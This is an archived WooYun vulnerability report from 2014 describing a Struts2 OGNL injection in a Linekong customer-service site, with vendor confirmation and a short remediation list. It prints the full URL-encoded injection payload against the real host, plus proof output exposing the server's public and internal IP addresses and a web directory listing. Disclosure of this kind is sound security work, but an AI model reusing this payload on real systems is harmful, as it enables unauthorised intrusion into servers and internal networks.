当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-052781

漏洞标题:蓝港某系统侧漏(可直接渗透内网)

相关厂商:linekong.com

漏洞作者: 啦绯哥

提交时间:2014-03-04 23:19

修复时间:2014-04-18 23:20

公开时间:2014-04-18 23:20

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-03-04: 细节已通知厂商并且等待厂商处理中
2014-03-05: 厂商已经确认,细节仅向厂商公开
2014-03-15: 细节向核心白帽子及相关领域专家公开
2014-03-25: 细节向普通白帽子公开
2014-04-04: 细节向实习白帽子公开
2014-04-18: 细节向公众公开

简要描述:

rt

详细说明:

http://kefu.linekong.com/eService/system/inputLogin.do?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29}

lan1.PNG

漏洞证明:


内网地址:
eth0 Link encap:Ethernet HWaddr 00:E0:81:D3:CB:59
inet addr:59.151.39.146 Bcast:59.151.39.191 Mask:255.255.255.192
inet6 addr: fe80::2e0:81ff:fed3:cb59/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3698165411 errors:0 dropped:0 overruns:0 frame:0
TX packets:3285674879 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:2434885196 (2.2 GiB) TX bytes:864802851 (824.7 MiB)
Memory:fbbe0000-fbc00000
eth1 Link encap:Ethernet HWaddr 00:E0:81:D3:CB:5A
inet addr:172.16.1.146 Bcast:172.16.1.255 Mask:255.255.255.0
inet6 addr: fe80::2e0:81ff:fed3:cb5a/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:521743597 errors:1 dropped:0 overruns:0 frame:1
TX packets:507251382 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2604270216 (2.4 GiB) TX bytes:178698027 (170.4 MiB)
Memory:fbae0000-fbb00000
ls一下web目录,似乎早有人来过了
drwxrwxr-x 2 jboss jboss 4096 Feb 27 20:13 css
-rw-rw-r-- 1 jboss jboss 630 Mar 31 2011 dateAndDay.jsp
drwxrwxr-x 12 jboss jboss 4096 Feb 27 20:13 datepicker
drwxrwxr-x 9 jboss jboss 4096 Feb 27 20:13 display
drwxrwxr-x 13 jboss jboss 4096 Feb 27 20:13 download
-rw-rw-r-- 1 jboss jboss 4236 Aug 5 2011 error.jsp
-rw-rw-r-- 1 jboss jboss 178 Mar 2 09:22 guige.jsp
drwxrwxr-x 20 jboss jboss 4096 Feb 27 20:13 images
-rw-rw-r-- 1 jboss jboss 8627 Jul 25 2013 index.jsp
drwxrwxr-x 18 jboss jboss 4096 Feb 27 20:13 js
-rw-rw-r-- 1 jboss jboss 2416 Mar 31 2011 jsontest.html
drwxrwxr-x 2 jboss jboss 4096 Feb 27 20:13 META-INF
-rw-rw-r-- 1 jboss jboss 15521 Aug 18 2011 plays.jsp
-rw-rw-r-- 1 jboss jboss 108 Mar 31 2011 redirect.jsp
-rw-rw-r-- 1 jboss jboss 14683 Aug 18 2011 service.jsp
-rw-rw-r-- 1 jboss jboss 13045 Aug 18 2011 use.jsp
-rw-rw-r-- 1 jboss jboss 6278 Mar 2 09:23 version.jsp
drwxrwxr-x 5 jboss jboss 4096 Feb 27 20:13 WEB-INF
这年头拿游戏数据的人太多了,赶紧补补,强烈建议厂商检查内网

修复方案:

1、补丁;
2、内网服务器检查

版权声明:转载请注明来源 啦绯哥@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-03-05 10:34

厂商回复:

已经在修复中,非常感谢!

最新状态:

暂无

漏洞评价:

评论

  1. 2014-03-05 09:30 | →Hack涛 ( 普通白帽子 | Rank:158 漏洞数:55 | 好好学习,天天向上!)

    @啦绯哥 两个洞才4rank!吃不消啊!!@蓝港在线(北京)科技有限公司 求礼物啊!!!